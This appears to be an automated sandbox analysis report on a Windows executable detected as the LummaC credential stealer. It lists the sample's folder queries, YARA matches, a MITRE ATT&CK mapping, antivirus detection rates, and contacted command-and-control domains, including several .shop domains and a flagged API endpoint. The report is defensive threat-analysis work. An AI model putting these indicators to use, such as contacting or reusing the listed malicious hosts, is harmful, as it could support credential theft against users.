            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: xNuh0DUJaG.exe PID: 7464, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: xNuh0DUJaG.exe PID: 7464, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		1
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		11
            Security Software Discovery            		Remote Services1
            Screen Capture            		21
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory1
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin Shares31
            Data from Local System            		3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
            Obfuscated Files or Information            		NTDS2
            File and Directory Discovery            		Distributed Component Object Model2
            Clipboard Data            		114
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
            Software Packing            		LSA Secrets22
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            xNuh0DUJaG.exe49%VirustotalBrowse
            xNuh0DUJaG.exe47%ReversingLabsWin32.Trojan.CrypterX
            xNuh0DUJaG.exe100%AviraHEUR/AGEN.1306978
            xNuh0DUJaG.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://sputnik-1985.com/apiOSCz100%Avira URL Cloudmalware
            https://sputnik-1985.com/apieB100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            steamcommunity.com
            		104.102.49.254
            		truefalse
              		high
              sputnik-1985.com
              		104.21.80.1
              		truefalse
                		high
                femalsabler.shop
                		unknown
                		unknowntrue
                  		unknown
                  robinsharez.shop
                  		unknown
                  		unknowntrue
                    		unknown
                    soundtappysk.shop
                    		unknown
                    		unknowntrue
                      		unknown
                      crowdwarek.shop
                      		unknown
                      		unknowntrue
                        		unknown
                        versersleep.shop
                        		unknown
                        		unknowntrue
                          		unknown
                          skidjazzyric.click
                          		unknown
                          		unknownfalse
                            		high
                            chipdonkeruz.shop
                            		unknown
                            		unknowntrue
                              		unknown
                              apporholis.shop
                              		unknown
                              		unknowntrue
                                		unknown
                                handscreamny.shop
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  robinsharez.shopfalse
                                    		high
                                    crowdwarek.shopfalse
                                      		high
                                      skidjazzyric.clickfalse
                                        		high
                                        https://sputnik-1985.com/apifalse
                                          		high
                                          femalsabler.shopfalse
                                            		high
                                            https://steamcommunity.com/profiles/76561199724331900false
                                              		high
                                              soundtappysk.shopfalse
                                                		high
                                                apporholis.shopfalse
                                                  		high
                                                  chipdonkeruz.shopfalse
                                                    		high
                                                    versersleep.shopfalse
                                                      		high

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngxNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/chrome_newtabxNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://player.vimeo.comxNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/ac/?q=xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://steamcommunity.com/?subsection=broadcastsxNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://store.steampowered.com/subscriber_agreement/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.gstatic.cn/recaptcha/xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.valvesoftware.com/legal.htmxNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.youtube.comxNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.google.comxNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackxNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englxNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://s.ytimg.com;xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://steam.tv/xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://steamcommunity.com/pxNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://store.steampowered.com/privacy_agreement/xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://store.steampowered.com/points/shop/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://ocsp.rootca1.amazontrust.com0:xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&axNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://sketchfab.comxNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.ecosia.org/newtab/xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://lv.queniujq.cnxNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brxNuh0DUJaG.exe, 00000003.00000003.1349882274.0000000003338000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.youtube.com/xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://sputnik-1985.com/apieBxNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              		unknown
                                                                                                                              https://store.steampowered.com/privacy_agreement/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_AxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://sputnik-1985.com/xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000568000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000566000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.google.com/recaptcha/xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://checkout.steampowered.com/xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://store.steampowered.com/;xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://store.steampowered.com/about/xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://steamcommunity.com/my/wishlist/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://help.steampowered.com/en/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://steamcommunity.com/market/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://store.steampowered.com/news/xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://store.steampowered.com/subscriber_agreement/xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgxNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
